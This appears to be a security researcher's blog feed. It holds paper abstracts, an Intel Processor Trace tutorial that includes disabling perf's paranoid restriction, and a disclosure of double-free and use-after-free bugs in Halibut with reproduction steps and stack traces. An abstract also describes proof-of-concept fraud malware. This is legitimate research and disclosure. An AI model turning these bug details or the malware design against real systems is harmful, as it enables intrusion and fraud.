Carter Yagemann

AI Psychiatry to Appear in USENIX'24

2024-05-09T10:35:00-04:00

My coauthors and I will be presenting the paper "AI Psychiatry: Forensic Investigation of Deep Learning Networks in Memory Images" at USENIX 2024 in August. Below is a preview of the abstract:

Online learning is widely used in production to refine model parameters after initial deployment. This opens several vectors for covertly launching attacks against deployed models. To detect these attacks, prior work developed black-box and white-box testing methods. However, this has left prohibitive open challenge: how the investigator is supposed to recover the model (uniquely refined on an in-the-field device) for testing in the first place. We propose a novel memory forensic technique, named AiP, which automatically recovers the unique deployment model and rehosts it in a lab environment for investigation. AiP navigates through both main memory and GPU memory spaces to recover complex ML data structures, using recovered Python objects to guide the recovery of lower-level C objects, ultimately leading to the recovery of the uniquely refined model. AiP then rehosts the model within the investigator's device, where the investigator can apply various white-box testing methodologies. We have evaluated AiP using three versions of TensorFlow and PyTorch with the CIFAR-10, LISA, and IMDB datasets. AiP recovered 30 models from main memory and GPU memory with 100% accuracy and rehosted them into a live process successfully.

CheatFighter to Appear in RAID'23

2023-07-21T09:20:00-04:00

My coauthors and I will be presenting the paper "Extracting Threat Intelligence From Cheat Binaries For Anti-Cheating" at RAID 2023 in October. Below is a preview of the abstract:

Rampant cheating remains a serious concern for game developers who fear losing loyal customers and revenue. While numerous anti-cheating techniques have been proposed, cheating persists in a vibrant (and profitable) illicit market. Inspired by novel insights into the economics behind cheat development and recent techniques for defending against advanced persistent threats (APTs), we propose a fully automated methodology for extracting "cheat intelligence" from widely distributed cheat binaries to produce a "memory access graph" that guides selective data randomization to yield immune game clients. We have implemented a prototype system for Android and Windows games, CheatFighter, and evaluated it on 86 cheats collected from a variety of real-world sources, including Telegram channels and online forums. CheatFighter successfully counteracts 80 of the real-world cheats in under a minute, demonstrating practical end-to-end protection against widespread cheating.

A Practical Beginner's Guide to Intel Processor Trace

2023-02-24T07:00:00-05:00

Greetings, if you're reading this tutorial, chances are you have some interest in Intel Processor Trace (PT) and how it can improve your debugging or program analysis capabilities, but aren't sure how to get started. This is understandable, given that there aren't many practical tutorials on Intel PT and what documentation is publicly available is scattered across Intel specifications, Linux documentation, and nuggets of text in various smaller projects. The existing text targets a vast range of audiences, ranging from low-level driver developers to experienced software engineers. Most, if not all, of that text is not newcomer friendly and it's easy to spend hours sifting through it only to find your basic questions unanswered.

With this in mind, I've written this tutorial to fulfill two goals. The first is to get newcomers up and running with Intel PT in as few steps as possible. This is a hands-on tutorial for people who want to quickly get hacking. In the process, I hope to also reveal to you what makes Intel PT so powerful and why it's my go to technology for any project involving dynamic program analysis. My second goal is to then point you to the various sources of more technical information with prefaces of what you'll find in each destination, so you can focus your exploration based on your ultimate needs and higher goals.

So with all that clarified, let's dive in.

Background: What is Intel PT?

If you stumbled upon this tutorial by chance and have no clue what Intel PT is, let's start with some background information and a bit of history. Readers who already know about Intel PT or don't care for a history lesson should skip to the next section.

Intel PT is one of a long line of hardware features developed and released by Intel to help developers gain better insights into how their software runs on Intel processors for debugging and performance profiling. If you're using an Intel processor built within the past decade, chances are it includes Intel PT.

Intel PT is a spiritual successor to technologies like hardware performance counters. Performance counters are an excellent solution if you want to know statistical information about the performance behaviors of a particular piece of code, like how often it encounters cache misses, but performance counters can't tell you much at a per-instruction granularity.

Intel PT aims to address this shortcoming by providing execution traces as opposed to just a set of counter registers. Each trace is a stream of packets representing different events, such as whether a branch was taken, how many processor cycles have elapsed, and so forth. These packets are flushed directly into physical memory, asynchronously, bypassing all caches, to enable recording of traces with minimal impact to the target program.

The original intended purpose of Intel PT was to enable advanced debugging and profiling of performance sensitive code. Intel PT yields precise information about executed instruction sequences, timing, and even energy consumption, to accurately record software behaviors without the overhead or artifacts that instrumentation code would introduce, such as cache interference. However, while Intel PT was originally intended for debugging and profiling, it is also an extremely powerful tool for guiding program analysis, which is why I use it extensively in my security research projects. Unlike any other technique currently available, Intel PT enables me to transparently observe feasible paths and timing information for real-world executions with only about a 2% performance impact to the target program. It can also successful yield traces in many tricky programs that break instrumentation tools like Intel PIN or DynamoRIO. This makes it my go to technology for collecting data to fuel my security solutions.

Getting Started: Linux Perf

The fastest way to start using Intel PT is to setup a Linux computer with an Intel CPU and install Perf. Note that at the time of writing, Intel PT does not play nicely with virtual machines or containers, so you'll need a computer that runs Linux as its native operating system. I'm going to walk through the steps using a Debian system, but the same steps should work for Ubuntu or (with a bit of tweaking) any other Linux system.

Step 1: Install Perf. Most Linux distributions include Perf as a package that can be installed via the default package manager. For Debian, you can install it by opening a terminal and running:

sudo apt install linux-perf

Be aware that since this package installs an additional kernel driver with some beefy startup behaviors, you may need to reboot your system at this point before proceeding.

Step 2: Verify Intel PT is available. Once Perf is installed, we should verify that it can access Intel PT. We can check this with the perf list command:

$ perf list | grep intel_pt
  intel_pt//                                         [Kernel PMU event]

If the above command prints no lines, then it means either your CPU doesn't have Intel PT or it provides a very old version that lacks all the features required to work with Perf.

Step 3: Adjust paranoid mode. By default, Perf only allows root to use Intel PT because it reveals a lot of information about traced programs. If you want to allow any user to access Intel PT, you can temporarily disable this restriction by running the command:

echo -1 | sudo tee /proc/sys/kernel/perf_event_paranoid

If you want to permanently disable it, you can add the following line to /etc/sysctl.conf:

kernel.perf_event_paranoid=-1

If you decide to leave this setting at its default level, be aware that you'll need to run the subsequent commands in this tutorial as root (or use sudo).

Step 4: Recording traces. We can record traces using the perf record command. For this tutorial, I'll use /bin/ls as my target program. Let's start with the most basic tracing:

$ perf record -e intel_pt//u -- /bin/ls
perf.data
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.043 MB perf.data ]

In this example, perf record is how I tell Perf I want to record something, -e intel_pt specifies that I want to record an Intel PT trace, //u specifies that I want to record only the user space portion of the program's execution (Intel PT can also record kernel execution) using the default Intel PT settings (more on this later) and then everything after the -- is the command that'll be executed and traced.

You'll notice that Perf prints some extra messages after the program finishes executing with useful information like how big the final trace is. Be aware that it is possible for a program to generate too much data for Intel PT and Perf to flush to storage in time, in which case the trace will contain holes. Perf's messages will warn you if this occurs.

If everything ran successfully, you should now have a perf.data file in your current working directory. This file contains the Intel PT trace along with some sideband data recorded by Perf's driver. This sideband records things like where objects were mapped into memory and when context switches between tasks occurred, which is needed in order to recover the executed instruction sequence and untangle threads if your target program runs on multiple CPU cores simultaneously.

Step 5: Decoding and recovery. In Intel PT terminology, we first have to decode the perf.data file to extract the trace of Intel PT events, and then combine that with the recorded sideband to recover the instruction execution sequence. Fortunately, Perf comes with scripts that can do this all for us in one step.

The simplest (and in my opinion, most useful) command is the following:

perf script --insn-trace

Note that by default, perf script tries to read ./perf.data. If your Perf output file is in another location or has a different name, you can specify its path using the -i flag.

This script recovers and prints the exact sequence of instructions our target program executed. Specifically, each line has the following format:

    ls         832828     [027]      8105202.171292271:     7fa2165d4c22    do_system+0x372 (/usr/lib/x86_64-linux-gnu/libc-2.31.so)    insn: 31 c0
^Executable^ ^Task ID^ ^CPU Core #^ ^Estimated Timestamp^ ^Virtual Address^ ^Symbol Offset^              ^Object^                    ^Instruction Bytes^

With this information, we now know the exact order instructions were executed, where those instructions resided in memory, how to map those instruction back to the original program and library files, and more. We can then use this information to, for example, build control flow graphs and other representations for program analysis.

If this is too granular for your desired use case, there's also other scripts that can process the trace into more coarse representations. For example, --call-trace will print only the function calls (along with their call depth), which you can use to extract a call graph for the execution. You can access the full manual for perf script by running man perf-script.

Additional Noteworthy Tricks

Disassembling instructions. You may have noticed that our instruction trace prints the raw bytes of the instructions instead of printing them in nice human-readable assembly. This is because in order to disassemble them, Perf needs access to a disassembler. Specifically, Perf integrates with Xed, which is Intel's official disassembler.

Unfortunately, the default APT repositories for Debian don't include a Xed package, so we'll need to compile and install Xed manually. Here's one way I've found to do this:

git clone https://github.com/intelxed/xed.git xed
git clone https://github.com/intelxed/mbuild.git mbuild
cd xed
./mfile.py examples
sudo cp ./obj/wkit/bin/xed /usr/local/bin/xed

Now that we've installed Xen, we can use the --xed flag with perf script:

perf script --insn-trace --xed

And now the instruction bytes are replaced with human-readable assembly.

Adjusting Timestamp Accuracy. As I pointed out in Step 5, part of the output from perf script --insn-trace includes an estimated timestamp of when each instruction executed. I emphasize the word estimated because the accuracy of this timestamp depends on how frequently we configure Intel PT to record timing packets.

To keep this tutorial concise, I won't go into the details of what the different timing packets are and their trade-offs, but I'll show you how to adjust them as an example of how to change Intel PT settings in perf record. We can specify any non-default Intel PT settings like so:

$ perf record -e intel_pt/cyc=1,cyc_thresh=0/u -- /bin/ls
perf.data
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.074 MB perf.data ]

In this case, what I've added is cyc=1, which enables the generation of CYC timing packets by Intel PT and cyc_thresh=0, which tells Intel PT to output these packets as frequently as possible. If you look very closely, you'll notice the trace size has almost doubled as a result, so be mindful of this when deciding how accurate you need the timestamps to be.

If we now rerun perf script --insn-trace, we'll see that the estimated timestamp updates more frequently, however it still isn't updated after every instruction. This is due to a limitation of Intel PT, but the specifics are outside the scope of this tutorial.

One final useful bit of information I'll point out regarding timing is if we add -F+ipc to our perf script command, it'll periodically print out fields like IPC: 4.14 (29/7). IPC stands for instructions per cycle, and in this example, it's saying that the previous 29 instructions executed in 7 clock cycles. This gives us a bit more insight into how the timestamps are changing.

VulChecker Accepted to USENIX 2023

2022-09-23T10:35:00-04:00

My coauthors and I will be presenting our work on detecting bugs in source code using machine learning at USENIX Security 2023. Below is a preview of the abstract:

In software development, it is critical to detect vulnerabilities in a project as early as possible. Although, deep learning has shown promise in this task, current state-of-the-art methods cannot classify and identify the line on which the vulnerability occurs. Instead, the developer is tasked with searching for an arbitrary bug in an entire function or even larger region of code.

In this paper, we propose VulChecker: a tool that can precisely locate vulnerabilities in source code (down to the exact instruction) as well as classify their type (CWE). To accomplish this, we propose a new program representation, program slicing strategy, and the use of a message-passing graph neural network to utilize all of code's semantics and improve the reach between a vulnerability's root cause and manifestation points.

We also propose a novel data augmentation strategy for cheaply creating strong datasets for vulnerability detection in the wild, using free synthetic samples available online. With this training strategy, VulChecker was able to identify 24 CVEs (10 from 2019 & 2020) in 19 projects taken from the wild, with nearly zero false positives compared to a commercial tool that could only detect 4. VulChecker also discovered an exploitable zero-day vulnerability, which has been reported to developers for responsible disclosure.

PUMM Accepted to USENIX 2023

2022-09-02T20:00:00-04:00

My coauthors and I will be presenting our work on preventing use-after-free and double free vulnerabilities at USENIX Security 2023. Below is a preview of the abstract:

Critical software is written in memory unsafe languages that are vulnerable to use-after-free and double free bugs. This has led to proposals to secure memory allocators by strategically deferring memory reallocations long enough to make such bugs unexploitable. Unfortunately, existing solutions suffer from high runtime and memory overheads. Seeking a better solution, we propose to profile programs to identify units of code that correspond to the handling of individual tasks. With the intuition that little to no data should flow between separate tasks at runtime, reallocation of memory freed by the currently executing unit is deferred until after its completion; just long enough to prevent use-after-free exploitation. To demonstrate the efficacy of our design, we implement a prototype for Linux, PUMM, which consists of an offline profiler and an online enforcer that transparently wraps standard libraries to protect C/C++ binaries. In our evaluation of 40 real-world and 3,000 synthetic vulnerabilities across 26 programs, including complex multi-threaded cases like the Chakra JavaScript engine, PUMM successfully thwarts all real-world exploits, and only allows 4 synthetic exploits, while reducing memory overhead by 52.0% over prior work and incurring an average runtime overhead of 2.04%.

Differentiating ARCUS (USENIX'21) and Bunkerbuster (CCS'21)

2022-08-31T13:00:00-04:00

I've received several questions recently about two papers I published in 2021, one at USENIX (which I'll refer to here as ARCUS) and another at CCS (which I'll refer to as Bunkerbuster). You can find these papers at the USENIX and CCS conference websites, respectively.

The question people have is what makes these two publications unique from each other? In short, how do I justify ARCUS and Bunkerbuster being two separate publications? This question is motivated by both papers being published in the same year, with aesthetically similar architecture diagrams, and my decision to ultimately merge the codebases together into a single repository. Did I pull the wool over the eyes of the reviewers (and my dissertation defense committee)? Were my advisors asleep at the wheel? These are legitimate questions to ask, so let me address them here.

For busy readers who want to get straight down to the technical brass tacks, here is the commit where ARCUS and Bunkerbuster were merged so the research community can interrogate the roughly 5,600 additions that Bunkerbuster contributed to the prior ARCUS codebase. To summarize the difference in 1 sentence: ARCUS (the first prototype) is a reactive system that requires traces containing exploits to be cherry-picked by preexisting defenses, whereas Bunkerbuster (the second prototype) is a proactive bug hunting system that can sift through 10 times more data, that does not contain exploits, to find and help fix bugs, hopefully before attackers can find and exploit them in-the-wild.

For those who wish to read on, I'll breakdown my high-level explanation into 3 sections: the story of how ARCUS was created, how the findings and unsolved problems in ARCUS then inspired the creation of Bunkerbuster, and the timeline and hidden logistics surrounding their publications.

ARCUS' Story

At its essence, ARCUS (the earlier of the two prototypes) tackles a simpler problem than Bunkerbuster. Specifically, in the ARCUS work, my collaborators and I wrestle with how to diagnose alerts generated by host-based defenses like intrusion detection systems or control flow integrity monitors. ARCUS is a purely reactive system that relies on other defenses to accurately feed it execution traces (captured using Intel Processor Trace) that contain low-level binary exploits. In short, ARCUS has no exploration capabilities and its performance is directly dependent on the false negative rate of whichever preexisting defenses ARCUS is integrated with. If an exploit goes undetected, ARCUS offers no assistance.

This is a strong prerequisite, but it was necessary in order to simplify the research problem enough to focus on the core technical contribution of inventing and demonstrating binary symbolic root cause analysis. To be clear, no research occurs in a vacuum. The idea of binary symbolic analysis builds on a wealth of prior knowledge, such as the Mayhem work published in 2012. However, accurately following real-world Intel PT recordings symbolically, defining and implementing reliable detection techniques for multiple classes of memory safety bug (buffer/integer overflow, use-after-free, double free, format string), and then figuring out how to leverage the recovered constraints to classify the root cause and propose a preliminary patch, convinced my peers and reviewers that ARCUS was a publication-worthy work, despite its narrow scope.

One other curious finding came out of the ARCUS work: it discovered 4 new vulnerabilities during the evaluation, even though it was analyzing traces containing known exploits. This caught us by surprise and became the kindling for a follow-up work: Bunkerbuster.

Bunkerbuster's Story

The goal of Bunkerbuster was to address all the shortcomings left behind by ARCUS. Gone is the prerequisite of there being preexisting defenses on the monitored system. In fact, we even removed the assumption that only 1 system is being monitored. Instead, we aimed to make Bunkerbuster a proactive, end-to-end bug hunting system, driven by benign recordings of production and end-user workloads to find and fix bugs before an attacker could even attempt exploitation in-the-wild. ARCUS was handed the needle (exploit) by a deus ex machina (preexisting defenses). Bunkerbuster would have to search the haystack.

Flowery analogies aside, what does that really mean at a technical level? First, in Bunkerbuster, we could no longer tiptoe around exploration. Unless Bunkerbuster could branch out into states not reached by the input traces, the chances of finding bugs from recordings of benign executions would be significantly reduced. To accomplish this, we created a new plugin class for guiding state exploration (while controlling state explosion) and designed and implemented search heuristics based on our domain expertise of memory safety bugs.

Second, Bunkerbuster had to sift through significantly more Intel PT data than ARCUS ever did because it was looking at benign executions rather than malicious ones cherry-picked by a host-based defense. In empirical terms, the dataset Bunkerbuster was evaluated on is 10 times larger than the ARCUS dataset, creating a noisy digital haystack. Bunkerbuster overcomes this challenge that would cripple ARCUS using an on-the-fly hashing and snapshotting technique that we describe in the CCS paper.

Timeline and Publication Logistics

The time to develop ARCUS (minus evaluation and paper writing) was about 1.5 years. Developing Bunkerbuster took an additional 1 year. So why did the papers appear to be published so close together? The answer is conference review cycles.

ARCUS was originally submitted to USENIX 2020, and then was resubmitted to USENIX 2021 as a major revision. This significantly inflated the time to publication, even after all the technical work on ARCUS was completed.

Conversely, because my collaborators and I had already gone through the hardships of publishing ARCUS, when we wrote the Bunkerbuster paper, we were able to avoid many similar pitfalls and address likely reviewer critiques upfront. The result was Bunkerbuster was accepted to CCS 2021 without major revision, which significantly reduced its time to publication compared to ARCUS.

In other words, when I gave my talk at USENIX 2021 on ARCUS, I was describing a system that had been finished over 1 year prior. For what it's worth, I'm currently involved in 2 papers that were submitted to USENIX 2022, but ended up in major revisions that were resubmitted to USENIX 2023. Should the reviewers accept these revisions, by the time my collaborators and I give our conference talks, we will be describing systems we built when I was still a PhD student, except I will now be 1 full year into my assistant professorship at The Ohio State University. I point this out not to raise a fuss about USENIX's review process, but just to emphasize that ARCUS' slow publication timeline is not a one-time anomaly. It's just the reality of large-scale peer review.

Conclusion

Hopefully this clarifies the question surrounding the publication of ARCUS and Bunkerbuster in 2021. I'm happy to answer additional questions that the community may have, and lastly I'd like to thank the readers who made it to the end of this text.

Happy hacking!

Update Regarding Halibut Bugs (CVE-2021-42612, CVE-2021-42613, CVE-2021-42614)

2022-06-03T11:45:00-04:00

The bugs that I found using ARCUS in Halibut last year have been issued 3 CVE IDs:

To the best of my knowledge, these bugs are now fixed in the latest release version, which at the time of writing is 1.3. Please refer to Halibut's project website for more details.

Faculty Position at The Ohio State University

2022-03-13T10:40:00-04:00

I have accepted an offer to become an Assistant Professor at The Ohio State University, starting in the Fall 2022 semester.

I am currently looking to hire 1 Ph.D. student as a full-time graduate research assistant (GRA). If you are an incoming student and you're interested in cutting edge techniques for automatically finding and fixing severe software vulnerabilities, let's have a chat. You can find my email address in this publication.

Case Study: Security Analysis of Halibut

2021-10-12T17:30:00-04:00

Over the past year I've been studying memory corruption vulnerabilities in Linux C/C++ programs, culminating in the open sourcing of a framework called ARCUS to find and explain them automatically using a combination of dynamic tracing and symbolic analysis. My work has led to two academic conference publications, one that appeared in this year's USENIX Security Symposium and another that will appear next month at ACM CCS.

Since then, I've been going through the Debian Popularity Contest and analyzing packages, leading to the discovery of vulnerabilities like CVE-2021-42006. In this post, I'd like to share 3 new vulnerabilities I've discovered in a program called Halibut, which is a document preparation system that currently sits at Rank 54,752 (by number of installs) out of 182,832 packages in the popularity contest.

Environment

I'm using the latest official release of Halibut, version 1.2, which is available on Debian Bullseye and Ubuntu Hirsute, to name a few Linux distributions. The target architecture is x86-64.

Double Free in `cleanup_index()` in `index.c`

Steps to Reproduce:

Download the PoC.
Run: halibut --winhelp poc-halibut-winhelp-df

Stack Trace:

#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7e1c537 in __GI_abort () at abort.c:79
#2  0x00007ffff7e75768 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f83e2d "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7e7ca5a in malloc_printerr (str=str@entry=0x7ffff7f861c8 "double free or corruption (fasttop)") at malloc.c:5347
#4  0x00007ffff7e7dd55 in _int_free (av=0x7ffff7fb5b80 <main_arena>, p=0x5555556a5500, have_lock=0) at malloc.c:4266
#5  0x00005555555784c5 in sfree (p=0x5555556a5510) at ../malloc.c:63
#6  0x000055555557867d in free_word_list (w=0x5555556ab7b0) at ../malloc.c:130
#7  0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#8  0x0000555555578154 in main (argc=0, argv=0x7fffffffe468) at ../main.c:404

Use-After-Free in `cleanup_index()` in `index.c`

Steps to Reproduce:

Download the PoC.
Run: halibut --text poc-halibut-text-uaf

Stack Trace:

#0  __GI___libc_free (mem=0x100000001) at malloc.c:3102
#1  0x00005555555784c5 in sfree (p=0x100000001) at ../malloc.c:63
#2  0x000055555557867d in free_word_list (w=0x7000700070007) at ../malloc.c:130
#3  0x000055555557869a in free_word_list (w=0x5555556f1900) at ../malloc.c:132
#4  0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#5  0x0000555555578154 in main (argc=0, argv=0x7fffffffe478) at ../main.c:404

Note: This is not the same vulnerability as the one above. Notice the recursion inside free_word_list and how the PoC triggers a segmentation fault rather than a double free abort.

Use-After-Free in `info_width_internal()` in `bk_info.c`

Steps to Reproduce:

Download the PoC.
Run: halibut --info poc-halibut-info-uaf

Stack Trace:

#0  info_width_internal (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:974
#1  0x000055555559c419 in info_width_internal_list (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:953
#2  0x000055555559c669 in info_width_internal (words=0x5555556ed5b0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:1009
#3  0x000055555559c776 in info_width_xrefs (ctx=0x7fffffffdf80, words=0x5555556ed5b0) at ../bk_info.c:1041
#4  0x000055555557b0cb in wrap_para (text=0x5555556ed5b0, width=66, subsequentwidth=66, widthfn=0x55555559c751 <info_width_xrefs>, ctx=0x7fffffffdf80, natural_space=0) at ../misc.c:328
#5  0x000055555559cab8 in info_para (text=0x5555556e8440, prefix=0x5555556a2d30, prefixextra=0x5555555c859c L".", input=0x5555556bcf80, keywords=0x5555556e1cd0, indent=1, extraindent=3, width=66, 
    cfg=0x7fffffffdf80) at ../bk_info.c:1120
#6  0x000055555559b38a in info_backend (sourceform=0x5555556a7dd0, keywords=0x5555556e1cd0, idx=0x5555556a2390, unused=0x0) at ../bk_info.c:579
#7  0x0000555555578119 in main (argc=0, argv=0x7fffffffe478) at ../main.c:398

Root Cause

According to ARCUS, the root cause appears to be frees that occur within get_token in input.c. Specifically, it labels Line 416:

       if (rsc.text) {
            in->pushback_chars = dupstr(rsc.text + prevpos);
            sfree(rsc.text);
        }

And Line 469:

    } else if (c == '{') {             /* tok_lbrace */
        ret.type = tok_lbrace;
        sfree(rsc.text);
        return ret;

There are several other lines in get_token that also call sfree and might be problematic.

Bunkerbuster to Appear in CCS'21

2021-09-06T13:00:00-04:00

My coauthors and I will be presenting the paper, Automated Bug Hunting With Data-Driven Symbolic Root Cause Analysis, at CCS 2021. Below is a preview of the abstract:

The increasing cost of successful cyberattacks has caused a mindset shift, whereby defenders now employ proactive defenses, namely software bug hunting, alongside existing reactive measures (firewalls, IDS, IPS) to protect systems. Unfortunately the path from hunting bugs to deploying patches remains laborious and expensive, requires human expertise, and still misses serious memory corruptions. Motivated by these challenges, we propose bug hunting using symbolically reconstructed states based on execution traces to achieve better detection and root cause analysis of overflow, use-after-free, double free, and format string bugs across user programs and their imported libraries. We discover that with the right use of widely available hardware processor tracing and partial memory snapshots, powerful symbolic analysis can be used on real-world programs while managing path explosion. Better yet, data can be captured from production deployments of live software on end-host systems transparently, aiding in the analysis of user clients and long-running programs like web servers.

We implement a prototype of our design, Bunkerbuster, for Linux and evaluate it on 15 programs, where it finds 39 instances of our target bug classes, 8 of which have never before been reported and have lead to 1 EDB and 3 CVE IDs being issued. These 0-days were patched by developers using Bunkerbuster’s reports, independently validating their usefulness. In a side-by-side comparison, our system uncovers 8 bugs missed by AFL and QSYM, and correctly classifies 4 that were previously detected, but mislabeled by AddressSanitizer. Our prototype accomplishes this with 7.21% recording overhead.

The code and data for this project will be made available on my public Github account.

MARSARA to Appear in CCS'21

2021-08-31T17:00:00-04:00

My coauthors and I will be presenting a paper on "Validating the Integrity of Audit Logs Against Execution Repartitioning Attacks" at CCS 2021. Below is a preview of the abstract:

Provenance-based causal analysis of audit logs has proven to be an invaluable method of investigating system intrusions. However, it also suffers from dependency explosion, whereby long-running processes accumulate many dependencies that are hard to unravel. Execution unit partitioning addresses this by segmenting dependencies into units of work, such as isolating the events that processed a single HTTP request. Unfortunately, we discover that current designs have a semantic gap problem due to how system calls and application log messages are used to infer complex internal program states. We demonstrate how attackers can modify existing code exploits to control event partitioning, breaking links in the attack and framing innocent users. We also show how our techniques circumvent existing program and log integrity defenses.

We then propose a new design for execution unit partitioning that leverages additional runtime data to yield verified partitions that resist manipulation. Our design overcomes the technical challenges of minimizing additional overhead while accurately connecting low level code instructions to high level audit events, in part with the use of commodity hardware processor tracing. We implement a prototype of our design for Linux, MARSARA, and extensively evaluate it on 14 real-world programs, targeted with expertly crafted exploits. MARSARA’s verified partitions successfully capture all the attack provenances while only reintroducing 2.82% of false dependencies, in the worst case, with an average overhead of 8.7%. Using a new metric called Partitioning Attack Surface, we show that MARSARA eliminates 47,642 more repartitioning gadgets per program than integrity defenses like CFI, demonstrating our prototype’s effectiveness and the novelty of the attacks it prevents

"Modeling Large-Scale Manipulation in Open Stock Markets" to Appear in IEEE Security & Privacy

2021-05-26T14:00:00-04:00

An article my coauthors and I wrote on automated large-scale market manipulation will be appearing in the November issue of IEEE Security & Privacy. It is currently available early access here. Below is the abstract:

This article studies the feasibility of using a botnet to automate stock market manipulation, incorporating data from U.S. Securities and Exchange Commission case files, security surveys of online retail brokerage accounts, and dark web marketplace listings.

ARCUS System and Dataset Released

2021-02-08T11:00:00-05:00

We have released the source code and evaluation dataset for "ARCUS: Symbolic Root Cause Analysis of Exploits in Production Systems," which will be appearing at USENIX Security 2021 in August, 2021.

The paper will be ready for publication in about a month.

Vulnerability Root Cause Analysis Approach "ARCUS" to Appear in USENIX'21

2020-12-12T10:00:00-05:00

My coauthors and I will be presenting a paper "ARCUS: Symbolic Root Cause Analysis of Exploits in Production Systems" at USENIX Security 2021 in August, 2021. Below is a preview of the abstract:

End-host runtime monitors (e.g., CFI, system call IDS) flag processes in response to symptoms of a possible attack. Unfortunately, the symptom (e.g., invalid control transfer) may occur long after the root cause (e.g., buffer overflow), creating a gap whereby bug reports received by developers contain (at best) a snapshot of the process long after it executed the buggy instructions. To help system administrators provide developers with more concise reports, we propose ARCUS, an automated framework that performs root cause analysis over the execution flagged by the end-host monitor. ARCUS works by testing "what if" questions to detect vulnerable states, systematically localizing bugs to their concise root cause while finding additional enforceable checks at the program binary level to demonstrably block them. Using hardware-supported processor tracing, ARCUS decouples the cost of analysis from host performance.

We have implemented ARCUS and evaluated it on 31 vulnerabilities across 20 programs along with over 9,000 test cases from the RIPE and Juliet suites. ARCUS identifies the root cause of all tested exploits — with 0 false positives or negatives — and even finds 4 new 0-day vulnerabilities in traces averaging 4,000,000 basic blocks. ARCUS handles programs compiled from upwards of 810,000 lines of C/C++ code without needing concrete inputs or re-execution.

In the coming months, we will also publish the source code for ARCUS and some sample data for the community to use. ARCUS has already led to the discovery of 4 novel vulnerabilities, one of which is currently public: EDB-47254. The others will be released in the coming months.

"Justitia" Biometric Privacy to Appear in ASIACCS'21

2020-10-26T10:00:00-04:00

My coauthors and I will be presenting the paper "Cryptographic Key Derivation from Biometric Inferences for Remote Authentication" at Asia CCS 2021 in June of next year. Below is a preview of the abstract:

Biometric authentication is getting increasingly popular because of its appealing usability and improvements in biometric sensors. At the same time, it raises serious privacy concerns since the common deployment involves storing bio-templates in remote servers. Current solutions propose to keep these templates on the client's device, outside the server's reach. This binds the client to the initial device. A more attractive solution is to have the server authenticate the client, thereby decoupling them from the device.

Unfortunately, existing biometric template protection schemes either suffer from the practicality or accuracy. The state-of-the-art deep learning (DL) solutions solve the accuracy problem in face- and voice-based verification. However, existing privacy-preserving methods do not accommodate the DL methods, as they are tailored to the hand-crafted feature space of specific modalities in general.

In this work, we propose a novel pipeline, Justitia, that makes DL-inferences of face and voice biometrics compatible with the standard privacy-preserving primitives, like fuzzy extractors (FE). For this, we first form a bridge between Euclidean (or cosine) space of DL and Hamming space of FE, while maintaining the accuracy and privacy of underlying schemes. We also introduce efficient noise handling methods to keep the FE scheme practically applicable.

We implement an end-to-end prototype to evaluate our design, then show how to improve the security for sensitive authentications and usability for non-sensitive, day-to-day, authentications. Justitia achieves the same, 0.33% false rejection at zero false acceptance, errors as the plaintext baseline does on the YouTube Faces benchmark. Moreover, combining face and voice achieves 1.32% false rejection at zero false acceptance. According to our systematical security assessments conducted through prior approaches and our novel black-box method, Justitia, achieves ~25 bits and ~33 bits of security guarantees for face- and face&voice-based pipelines, respectively.

"Bot2Stock" to Appear in ACSAC'20

2020-10-04T10:00:00-04:00

My coauthors and I will be presenting a paper "On the Feasibility of Automating Stock Market Manipulation" at ACSAC 2020 in December. Below is a preview of the abstract:

This work presents the first findings on the feasibility of using botnets to automate stock market manipulation. Our analysis incorporates data gathered from SEC case files, security surveys of online brokerages, and dark web marketplace data. We address several technical challenges, including how to adapt existing techniques for automation, the cost of hijacking brokerage accounts, avoiding detection, and more. We consolidate our findings into a working proof-of-concept, man-in-the-browser malware, Bot2Stock, capable of controlling victim email and brokerage accounts to commit fraud. We evaluate our bots and protocol using agent-based market simulations, where we find that a 1.5% ratio of bots to benign traders yields a 2.8% return on investment (ROI) per attack. Given the short duration of each attack (< 1 minute), achieving this ratio is trivial, requiring only 4 bots to target stocks like IBM. 1,000 bots, cumulatively gathered over 1 year, can turn $100,000 into $1,022,000, placing Bot2Stock on par with existing botnet scams.

The evaluation artifact is also available, however be warned that we used a 32-core server to generate the results so casual users may find the experiments difficult to reproduce.

New CVE Published (CVE-2020-14931)

2020-06-29T18:00:00-04:00

CVE-2020-14931 has been assigned for a vulnerability I found in DMitry. The details are available here.

This issue is currently being patched.

H&R Block App Analytics for 2020

2020-06-18T17:30:00-04:00

Two years ago I started a series about using the analytics publicly released by the USA government to gleam some information about H&R Block's mobile apps. I'm a few months late this year, but it's time to update the numbers for the 2020 tax year. The 2019 numbers are available here.

This time I went ahead and updated the code to make parsing a little more flexible:

:::python
#!/usr/bin/env python
from __future__ import print_function

import sys
import json
import re

def parse_subtokens(tokens):
    """ Parses subtokens and returns a dictionary. If invalid, None is returned.

    We expect all user agents to start with "HBR MOBILE", after which we can encounter
    OS, device, app, authentication, browser, and app version strings. Everything except
    version is matched using exact string comparisons. Version uses a regex.
    """
    res = {'OS': 'N/A', 'DEVICE': 'N/A', 'APP': 'N/A', 'AUTH': 'N/A', 'VERSION': 'N/A', 'BROWSER': 'N/A'}

    token_mapping = {'ANDROID': 'OS', 'IOS': 'OS',
                     'PHONE': 'DEVICE', 'TABLET': 'DEVICE',
                     'MYBLOCK': 'APP', 'TAXES': 'APP',
                     'TOUCHID': 'AUTH', 'FACEID': 'AUTH',
                     'Mozilla': 'BROWSER'}

    if tokens[0] != 'HRB':
        return None

    if tokens[1] != 'MOBILE':
        return None

    for token in tokens[2:]:
        if token in token_mapping:
            res[token_mapping[token]] = token
        elif re.match('v?[0-9]+\.[0-9]+\.[0-9]+', token):
            res['VERSION'] = token
        else:
            print('WARNING: Unknown token: %s from %s' % (token, str(tokens)), file=sys.stderr)

    # Cleanups:
